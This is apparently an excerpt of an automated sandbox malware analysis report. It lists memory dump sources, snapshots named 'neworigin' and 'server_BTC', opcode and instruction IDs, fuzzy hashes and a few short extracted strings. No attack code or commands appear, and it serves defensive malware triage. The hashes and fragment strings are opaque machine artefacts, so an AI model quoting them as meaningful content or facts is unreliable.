                                                                                                              • Instruction Fuzzy Hash: E511D0B5D01259AFCB10DF9AD884BDEFBF8FB48310F10812AE918A7210C375A944CFA5
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 0000000D.00000002.1731337027.0000000006A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A90000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_13_2_6a90000_neworigin.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 3c1778e0ba6e34f9584729f8201a280d8d1d50493144fa288963f257708390e1
                                                                                                              • Instruction ID: 92b34ca64822079e06dfd3d468791ef09840d46b9303ebbd06f936ae3aa063b1
                                                                                                              • Opcode Fuzzy Hash: 3c1778e0ba6e34f9584729f8201a280d8d1d50493144fa288963f257708390e1
                                                                                                              • Instruction Fuzzy Hash: 2B018B71B101200BDB64A67D9450B2FF2EADBCD710F20883AE10ACB354DD65DC0343A1
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 0000000D.00000002.1731337027.0000000006A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A90000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_13_2_6a90000_neworigin.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 8c89c64e94e9e8b9107bb2e09989cd251f0ce3d65afe3a33ab2bb0bfbbafd382
                                                                                                              • Instruction ID: 186b6b0c09f962e6c752d211d37f4ff190a9408ddd6ababfc1b239fce4afe2d5
                                                                                                              • Opcode Fuzzy Hash: 8c89c64e94e9e8b9107bb2e09989cd251f0ce3d65afe3a33ab2bb0bfbbafd382
                                                                                                              • Instruction Fuzzy Hash: A3017571B005104FDBA1EB7CE594B6A77E2EBC9710F208829E50ACB355DE25DC068B95
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 0000000D.00000002.1731337027.0000000006A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A90000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_13_2_6a90000_neworigin.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: df3c694e9c23e980cae4f4a1b34779511caef07c53be55510b8ec505c7102e9c
                                                                                                              • Instruction ID: ebeabea5e623e18b8ae042cf3cf66d000f05a6c7665cae6231e3b6e87bfe3048
                                                                                                              • Opcode Fuzzy Hash: df3c694e9c23e980cae4f4a1b34779511caef07c53be55510b8ec505c7102e9c
                                                                                                              • Instruction Fuzzy Hash: 3001B132B005649FDF95E66DD8646EF3BE79BC9300F14013AD905DB348DE608C0687E0
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 0000000D.00000002.1731337027.0000000006A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A90000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_13_2_6a90000_neworigin.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: c82d3341ca506dd0d6f208b5adf304f69e21b40ae4c1368e71de7014629e27bb
                                                                                                              • Instruction ID: b838183036d19b2e4c3f09f3fc44d7ebeb0ea600daaf80ef4a2933f25e3651e1
                                                                                                              • Opcode Fuzzy Hash: c82d3341ca506dd0d6f208b5adf304f69e21b40ae4c1368e71de7014629e27bb
                                                                                                              • Instruction Fuzzy Hash: 01018131B101201BDF65E7ADA450B6F63DAEFC9714F24883EE10ACB341DE65DC4243A1
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 0000000D.00000002.1731337027.0000000006A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A90000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_13_2_6a90000_neworigin.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: d57593fa6c7ec632f49f89d3fffbbe2491e0b520d14aadd12228ddfeec5ae6a9
                                                                                                              • Instruction ID: 689acf4791a4118aca9dee11c094b98c0c0ff83e2ed0a21bd089b704edce4c3b
                                                                                                              • Opcode Fuzzy Hash: d57593fa6c7ec632f49f89d3fffbbe2491e0b520d14aadd12228ddfeec5ae6a9
                                                                                                              • Instruction Fuzzy Hash: 54018171B005140FDFA1EB6CE454B2A73E6EBC9720F208C3AE20ACB355DE25DC428B91
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 0000000D.00000002.1731337027.0000000006A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A90000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_13_2_6a90000_neworigin.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 925ebf4ebec0839ae9deb1c4a8bc14b92bd83b95dff0ad18517efe41e3c9ab0b
                                                                                                              • Instruction ID: e43102730db3f109dbf47bc22082d57e56ab261ea9e74d703eeb47b6f34850bc
                                                                                                              • Opcode Fuzzy Hash: 925ebf4ebec0839ae9deb1c4a8bc14b92bd83b95dff0ad18517efe41e3c9ab0b
                                                                                                              • Instruction Fuzzy Hash: 1EF0EC33F20228ABDF24AA69DC1099AB37AE784364F104435ED01E7344D7316C00C7D0
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 0000000D.00000002.1731337027.0000000006A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A90000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_13_2_6a90000_neworigin.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 0f7b344c9d80334d8020ffb6537d2e80fe261b834ac0fb1e01c11b23734ba64d
                                                                                                              • Instruction ID: a5ca49ea468cca9d50ca8e21a96d58cd5d2d6e7709e917ece495459d3d88ea1d
                                                                                                              • Opcode Fuzzy Hash: 0f7b344c9d80334d8020ffb6537d2e80fe261b834ac0fb1e01c11b23734ba64d
                                                                                                              • Instruction Fuzzy Hash: 28E09A71E15208ABEF50EFB4C90978A7BFDDB06208FA048A5E404CF242E576ED0287A1
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 0000000D.00000002.1731337027.0000000006A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A90000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_13_2_6a90000_neworigin.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: $q$$q$$q$$q$$q$$q$$q$$q$$q$$q
                                                                                                              • API String ID: 0-1298971921
                                                                                                              • Opcode ID: 63eb638057e40edb9ca21646b1f79689a374e2c96f65f5b4397f5eaab913f806
                                                                                                              • Instruction ID: b15a1459509582d73446c8e465e636f54ee25c9582f1cec0e0ba6b9ebd0f6254
                                                                                                              • Opcode Fuzzy Hash: 63eb638057e40edb9ca21646b1f79689a374e2c96f65f5b4397f5eaab913f806
                                                                                                              • Instruction Fuzzy Hash: FC121871A106198FDF68EB65C854BADB7F2BF89301F2485A9D406AB354DB30DD81CFA0
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 0000000D.00000002.1731337027.0000000006A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A90000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_13_2_6a90000_neworigin.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: $q$$q$$q$$q$$q$$q$$q$$q
                                                                                                              • API String ID: 0-3886557441
                                                                                                              • Opcode ID: ba603ea2e59a8afaef7ae0c2c5ef84dc9d4bf4e1d2e270a942163b41b28fa86f
                                                                                                              • Instruction ID: 7cef319d85f1687bd2d659355a401683504c541bf2598e16f4cf8824ee551f56
                                                                                                              • Opcode Fuzzy Hash: ba603ea2e59a8afaef7ae0c2c5ef84dc9d4bf4e1d2e270a942163b41b28fa86f
                                                                                                              • Instruction Fuzzy Hash: 09917230A00209DFEF68EF65D554BAE77F2BF84301F24852AE5429B354DB749C41CBA0
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 0000000D.00000002.1731337027.0000000006A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A90000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_13_2_6a90000_neworigin.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: $q$$q$$q$$q$$q$$q
                                                                                                              • API String ID: 0-2069967915
                                                                                                              • Opcode ID: acc18dc9457ee160839bd948626d64443d12d7bb3902c1b5b4c953f1fc2ee1cb
                                                                                                              • Instruction ID: 3d80b846026a52bc05fa231479aab170f3ab9f313406d5583265ded44974e2b3
                                                                                                              • Opcode Fuzzy Hash: acc18dc9457ee160839bd948626d64443d12d7bb3902c1b5b4c953f1fc2ee1cb
                                                                                                              • Instruction Fuzzy Hash: 34F13A34A10209CFDB58EF64D594B6EB7F2BF84300F648569D4469B358DB75EC82CBA0
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 0000000D.00000002.1731337027.0000000006A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A90000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_13_2_6a90000_neworigin.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: $q$$q$$q$$q
                                                                                                              • API String ID: 0-4102054182
                                                                                                              • Opcode ID: e5e84ffdb48b160478ce81f7b171ae3ea41699bab544941f14f66802b3710a14
                                                                                                              • Instruction ID: 8fc55e8ee0a562b3658888567f8eaa1821c5b2924540457b0b493b10d0b7e20b
                                                                                                              • Opcode Fuzzy Hash: e5e84ffdb48b160478ce81f7b171ae3ea41699bab544941f14f66802b3710a14
                                                                                                              • Instruction Fuzzy Hash: BCB12D70A102198FDF58EB65D5907AEB7F2BF85300F648929D0069B358DB79DC86CBA0
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 0000000D.00000002.1731337027.0000000006A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A90000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_13_2_6a90000_neworigin.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: LRq$LRq$$q$$q
                                                                                                              • API String ID: 0-2204215535
                                                                                                              • Opcode ID: 9ea9fe9b65ca38c02dd74be78eb6a85ef6af71ee72fa74cf95f61513cda24489
                                                                                                              • Instruction ID: 4e19ad6343413235e57e99364ef60225de1285baea77af22504c6c0169fba86d
                                                                                                              • Opcode Fuzzy Hash: 9ea9fe9b65ca38c02dd74be78eb6a85ef6af71ee72fa74cf95f61513cda24489
                                                                                                              • Instruction Fuzzy Hash: 6651B531B002058FDF58EB68D550B6A77F2BF4A300F248969E4429F399DB75EC40CB65
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 0000000D.00000002.1731337027.0000000006A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A90000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_13_2_6a90000_neworigin.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: $q$$q$$q$$q
                                                                                                              • API String ID: 0-4102054182
                                                                                                              • Opcode ID: 0030a73f8738fce6b48e44986b92656d2fbd3e3e7a39bf2052444c8a3265ac41
                                                                                                              • Instruction ID: 91d34f2224582141e27d5e930d6ed195cdd93fb2a4bdff3c88d1d8a6a9301ba8
                                                                                                              • Opcode Fuzzy Hash: 0030a73f8738fce6b48e44986b92656d2fbd3e3e7a39bf2052444c8a3265ac41
                                                                                                              • Instruction Fuzzy Hash: 6D519171E102158FDF64EB68D590AAEB3F2EF89304F24852AE506DB344DB34DC81CBA1
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 0000000E.00000002.1523540148.0000000000980000.00000040.00000800.00020000.00000000.sdmp, Offset: 00980000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_14_2_980000_server_BTC.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 53bf5483379535879d051da2515dc7fff688dcefe0fcd3c9247c4ae027841f22
                                                                                                              • Instruction ID: 139bae7354e83dbde187977f2443a3d327670ad6cc7be9d0afc4c5cca82e3367
                                                                                                              • Opcode Fuzzy Hash: 53bf5483379535879d051da2515dc7fff688dcefe0fcd3c9247c4ae027841f22
                                                                                                              • Instruction Fuzzy Hash: CE61E574A00248CFCB44DFA9D994A9CBBF1FF89310F1580AAE806AB365DB30AC45CF14
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 0000000E.00000002.1523540148.0000000000980000.00000040.00000800.00020000.00000000.sdmp, Offset: 00980000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_14_2_980000_server_BTC.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 67058a9f67132da7418596e90563bb1922eb41994bb8e2d8adcf3261dd1a73fb
                                                                                                              • Instruction ID: 3fe1fc787e427efd777f669f27fa359e52f0f0910c62e31adab7f2a380ad7f6d
                                                                                                              • Opcode Fuzzy Hash: 67058a9f67132da7418596e90563bb1922eb41994bb8e2d8adcf3261dd1a73fb
                                                                                                              • Instruction Fuzzy Hash: 8E71E174D00219CFDB15EFA4D895AADBBB2FF89300F608569D405AB364DB35AD8ACF40
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 0000000E.00000002.1523540148.0000000000980000.00000040.00000800.00020000.00000000.sdmp, Offset: 00980000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_14_2_980000_server_BTC.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 6b8943891d645f0a01f7c12e3ee964bdc899f0ffb8ddb3790a4bcf5c73d51320
                                                                                                              • Instruction ID: e2ba26c34ef35c61267247206381f7e8c843f406fd0ad11f077fb602bb144ead
                                                                                                              • Opcode Fuzzy Hash: 6b8943891d645f0a01f7c12e3ee964bdc899f0ffb8ddb3790a4bcf5c73d51320
                                                                                                              • Instruction Fuzzy Hash: 1F61EF74D052489FDB14EFE9D984BEEFBB5AF48300F24802AE415AB350CB759946CF50
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 0000000E.00000002.1523540148.0000000000980000.00000040.00000800.00020000.00000000.sdmp, Offset: 00980000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_14_2_980000_server_BTC.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: b6fd26074bf77e881763c623a88f5ae52fd361ca76af30990b4a7860c8e208d0
                                                                                                              • Instruction ID: e50a544df09f4133298d9c6a4e882a020e4286a8169b550558b4300216a7613b
                                                                                                              • Opcode Fuzzy Hash: b6fd26074bf77e881763c623a88f5ae52fd361ca76af30990b4a7860c8e208d0
                                                                                                              • Instruction Fuzzy Hash: 1541CAB0D042489FDB14DFEAC884ADEFBB6AF48300F24802AE519AB254D7349986CF54
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 0000000E.00000002.1523540148.0000000000980000.00000040.00000800.00020000.00000000.sdmp, Offset: 00980000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_14_2_980000_server_BTC.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: bcbd5a6d2db10bd04676b84d52d5647140191b1ff9a01b419262731451d1464a
                                                                                                              • Instruction ID: 52a1fe4345c93782a478cd738b5e991545ae59f8c7e037f14138ba84a3b9d9e7
                                                                                                              • Opcode Fuzzy Hash: bcbd5a6d2db10bd04676b84d52d5647140191b1ff9a01b419262731451d1464a
                                                                                                              • Instruction Fuzzy Hash: 2E41CBB0D042489FDB14DFEAC884ADEFBF6AF48300F24802AE519AB254D7349986CF54
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 0000000E.00000002.1523540148.0000000000980000.00000040.00000800.00020000.00000000.sdmp, Offset: 00980000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_14_2_980000_server_BTC.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: Jq
                                                                                                              • API String ID: 0-1804594866
                                                                                                              • Opcode ID: 3c7ecc90ad6a5ee0319a2a45e0b8e1770da7c06436417223cdd532cc01fa9495
                                                                                                              • Instruction ID: 73bbc14ac798f5eb874a57158bdd8695d528545658aca8f0fa39fab4a345c02e
                                                                                                              • Opcode Fuzzy Hash: 3c7ecc90ad6a5ee0319a2a45e0b8e1770da7c06436417223cdd532cc01fa9495
                                                                                                              • Instruction Fuzzy Hash: ED41D275E002089FDB08DFA9D894BEEBBB2AF8A301F108069E515B72A0DB759941CF54
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 0000000E.00000002.1523540148.0000000000980000.00000040.00000800.00020000.00000000.sdmp, Offset: 00980000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_14_2_980000_server_BTC.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: Jq
                                                                                                              • API String ID: 0-1804594866
                                                                                                              • Opcode ID: b557b83e32e800af94cdf0c561529bcdc95b9eaf6303a94cbe9c1c165e21e421
                                                                                                              • Instruction ID: fd49d5d814a603f5a3d413a16e8c5214a6561599f1e40cf286f8da0d5b4fc20c
                                                                                                              • Opcode Fuzzy Hash: b557b83e32e800af94cdf0c561529bcdc95b9eaf6303a94cbe9c1c165e21e421
                                                                                                              • Instruction Fuzzy Hash: EC018C38A042088FD700DFA0E854BAEB771FB8A312F204115D51963290DB319C01DBA5
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 0000000E.00000002.1523540148.0000000000980000.00000040.00000800.00020000.00000000.sdmp, Offset: 00980000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_14_2_980000_server_BTC.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 92673f33b4443cf8e14369e27fdbf706f58329d15b545c1ce814c023901c8a3a
                                                                                                              • Instruction ID: 399a7650dca6febe6526000412c6b69040c34f559943bc0daf8eef62d4ccc843
                                                                                                              • Opcode Fuzzy Hash: 92673f33b4443cf8e14369e27fdbf706f58329d15b545c1ce814c023901c8a3a
                                                                                                              • Instruction Fuzzy Hash: E7B29270A01318CFDB65EF64C894B9DBBB6BB89300F6185E9E409A7765DB319E81CF40
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 0000000E.00000002.1523540148.0000000000980000.00000040.00000800.00020000.00000000.sdmp, Offset: 00980000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_14_2_980000_server_BTC.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: c5255156fd544c706032861b072d6c16231dddb948cdd3738954a1c85d712342
                                                                                                              • Instruction ID: 27d85893554dda8855d04905eccd4154aa25cac8b98428f2693ed45b0b69e459
                                                                                                              • Opcode Fuzzy Hash: c5255156fd544c706032861b072d6c16231dddb948cdd3738954a1c85d712342
                                                                                                              • Instruction Fuzzy Hash: 7BB29270A01318CFDB65EF64C894B9DBBB6BB89300F6185E9E409A7765DB319E81CF40
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 0000000E.00000002.1523540148.0000000000980000.00000040.00000800.00020000.00000000.sdmp, Offset: 00980000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_14_2_980000_server_BTC.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 059924916700a716afa4c1589b90797b8f1f0c23101dc98ee5c12e2dd6af18a4
                                                                                                              • Instruction ID: 050b1244805a7bb8093dc72325dbb2b53387ede41fd836f1d2f99a8f89b53df4
                                                                                                              • Opcode Fuzzy Hash: 059924916700a716afa4c1589b90797b8f1f0c23101dc98ee5c12e2dd6af18a4
                                                                                                              • Instruction Fuzzy Hash: 9C62AF74905218CFDB65EF64D894B9DBBB2BF89300F2184E9D40AA7365DB35AE81CF40
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 0000000E.00000002.1523540148.0000000000980000.00000040.00000800.00020000.00000000.sdmp, Offset: 00980000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_14_2_980000_server_BTC.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 12f265fa575ccafc1b5f7c4b08546edbad90ef6012799a8f8a8878f4b0762026
                                                                                                              • Instruction ID: 64c76d46da6d0ec7e9fd7b09e0bb6dd52bf4262dd1a71d70ae210c5d3bb8e762
                                                                                                              • Opcode Fuzzy Hash: 12f265fa575ccafc1b5f7c4b08546edbad90ef6012799a8f8a8878f4b0762026
                                                                                                              • Instruction Fuzzy Hash: E4629F74915218CFDB65EF64D894B9DBBB2BF89300F2184E9D409A7365DB31AE81CF40
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 0000000E.00000002.1523540148.0000000000980000.00000040.00000800.00020000.00000000.sdmp, Offset: 00980000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_14_2_980000_server_BTC.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 98d02dd70f875734bfb1284b46a6b820f73b2102a47b5d1059ce9dc414956bc4
                                                                                                              • Instruction ID: eced2c7eea72582ab689823124567a78ee46ef519b07d8fe5109e24e3ea98581
                                                                                                              • Opcode Fuzzy Hash: 98d02dd70f875734bfb1284b46a6b820f73b2102a47b5d1059ce9dc414956bc4
                                                                                                              • Instruction Fuzzy Hash: 6641D0B0D042889FDB14DFEAD484A9DFFF5AF49300F24846AE414AB361D7749946CF50
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 0000000E.00000002.1523540148.0000000000980000.00000040.00000800.00020000.00000000.sdmp, Offset: 00980000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_14_2_980000_server_BTC.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 3f8678075293fac63facb090b8433bce9f114a0f3c8330d727241a2e0f2c7307
                                                                                                              • Instruction ID: 0dc7e8a53ee75af31124441d6a71b87def60f6c988d4df26b633cf268c0faa21
                                                                                                              • Opcode Fuzzy Hash: 3f8678075293fac63facb090b8433bce9f114a0f3c8330d727241a2e0f2c7307
                                                                                                              • Instruction Fuzzy Hash: 6EB1DBB4A01228CFDB60EF28D994B9DBBB2BB49300F1085E9D40DA7355DB30AE85CF51
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 0000000E.00000002.1523540148.0000000000980000.00000040.00000800.00020000.00000000.sdmp, Offset: 00980000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_14_2_980000_server_BTC.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 160708ad5b227e0d61b6c9dbd2a8b8b86339a9f7867da96fdeccbc77ab1ebf10
                                                                                                              • Instruction ID: 04726b1fec83f2116cd36df12429363be2db68465fafa3b31095325ec53d505a
                                                                                                              • Opcode Fuzzy Hash: 160708ad5b227e0d61b6c9dbd2a8b8b86339a9f7867da96fdeccbc77ab1ebf10
                                                                                                              • Instruction Fuzzy Hash: BF91A574E00318CFCB54EFA4D894A9EBBB5BF89300F6185A9E409A7765DB34AD41CF50
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 0000000E.00000002.1523540148.0000000000980000.00000040.00000800.00020000.00000000.sdmp, Offset: 00980000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_14_2_980000_server_BTC.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 3a7d14314e696f070626abf37c7eba0b175d687aae22b7765dedf0e04c484da0
                                                                                                              • Instruction ID: 40a528ba05d3b49c6e71c20d7cfec42c537da41377f957fb2d277902ea480b5b
                                                                                                              • Opcode Fuzzy Hash: 3a7d14314e696f070626abf37c7eba0b175d687aae22b7765dedf0e04c484da0
                                                                                                              • Instruction Fuzzy Hash: 6B819274E00318CFCB54EFA8D894A9DBBB5BF89300F6185AAE409A7765DB30AD41CF50
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 0000000E.00000002.1523540148.0000000000980000.00000040.00000800.00020000.00000000.sdmp, Offset: 00980000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_14_2_980000_server_BTC.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 7129d80dbc341a09b6387437d1aa9b82ca1437deda7943d05c0410af7186d010
                                                                                                              • Instruction ID: 73d5f87297f91f2e4ae13fffd186b82c144385955050fd1e50553b80b80ea5ac
                                                                                                              • Opcode Fuzzy Hash: 7129d80dbc341a09b6387437d1aa9b82ca1437deda7943d05c0410af7186d010
                                                                                                              • Instruction Fuzzy Hash: 7951BEB8D05308CFDB44EFA9E4946EDBBF5BB49300F20952AE425AB355DB389942CF50
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 0000000E.00000002.1523540148.0000000000980000.00000040.00000800.00020000.00000000.sdmp, Offset: 00980000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_14_2_980000_server_BTC.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 29aebb93450b60c73155ee7c3639387e002574d0433b30203a2f74fba23e535f
                                                                                                              • Instruction ID: 53045078b5d67dbbd7e63ebad382c1c8d04757e06223f7ed10bd54e4f78fcf60
                                                                                                              • Opcode Fuzzy Hash: 29aebb93450b60c73155ee7c3639387e002574d0433b30203a2f74fba23e535f
                                                                                                              • Instruction Fuzzy Hash: 4241BDB0D042489FDB14DFEAD484ADEFBF5AF48300F24802AE418AB364DB759986CF50
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 0000000E.00000002.1523540148.0000000000980000.00000040.00000800.00020000.00000000.sdmp, Offset: 00980000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_14_2_980000_server_BTC.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 62a90bb2040fd4df92f119495e00a8918875929f933b41c27a0a4a2bae5da063
                                                                                                              • Instruction ID: 18ca0e9b4288377c0853cd64b8daa8de929ae7c6d1cc3d9f5e4fb867b26ee2fa
                                                                                                              • Opcode Fuzzy Hash: 62a90bb2040fd4df92f119495e00a8918875929f933b41c27a0a4a2bae5da063
                                                                                                              • Instruction Fuzzy Hash: F8310274E00209CFCB48EFB5D481AEEBBB2AF89300F10946AD415B7394CB369D41CB60
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 0000000E.00000002.1523540148.0000000000980000.00000040.00000800.00020000.00000000.sdmp, Offset: 00980000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_14_2_980000_server_BTC.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 7f26c1b8156472ced7e523e15cbf81c0271deca140c45c522f4f662038426d6f
                                                                                                              • Instruction ID: 963bd56145a3634543d321cda2da89bb081c508b0ed3ebc4396b396588eea632
                                                                                                              • Opcode Fuzzy Hash: 7f26c1b8156472ced7e523e15cbf81c0271deca140c45c522f4f662038426d6f
                                                                                                              • Instruction Fuzzy Hash: CC21F274E002098FCB48EFB5D581AEEB7B6AF89300F60946AD415B7394CB36AD45CF60
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 0000000E.00000002.1523540148.0000000000980000.00000040.00000800.00020000.00000000.sdmp, Offset: 00980000, based on PE: false
